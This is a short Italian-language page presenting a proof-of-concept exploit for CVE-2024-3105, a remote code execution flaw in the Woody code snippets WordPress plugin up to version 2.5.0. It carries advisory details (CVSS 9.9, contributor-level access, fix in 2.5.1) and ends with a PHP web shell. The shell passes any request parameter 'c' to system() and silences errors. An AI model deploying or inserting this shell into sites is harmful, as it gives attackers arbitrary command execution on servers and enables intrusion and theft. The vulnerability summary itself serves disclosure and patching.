
Un Exploit PoC per CVE-2024-3105 - The Woody code snippets – Insert Header Footer Code, plugin AdSense Ads per WordPress Esecuzione di codice remoto (RCE)
Il plugin Woody code snippets – Insert Header Footer Code, AdSense Ads per WordPress è vulnerabile all'esecuzione di codice remoto in tutte le versioni fino alla 2.5.0 inclusa tramite lo shortcode 'insert_php'. Ciò è dovuto al fatto che il plugin non limita l'uso della funzionalità agli utenti autorizzati di alto livello. Ciò consente a utenti autenticati, con accesso a livello di collaboratore o superiore, di eseguire codice sul server.
Punteggio Base: 9.9 CRITICO
Vettore: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Tipo di Software: Plugin
Slug del Software: insert-php
Rimedio: Aggiornare alla versione 2.5.1 o a una versione patchata più recente
Versione Affetta: <= 2.5.0
<?php
error_reporting(0);
$cmd = "$_REQUEST[c]";
if ($cmd == "") {
$cmd = "echo > NUL";
}
@system("$cmd");
?>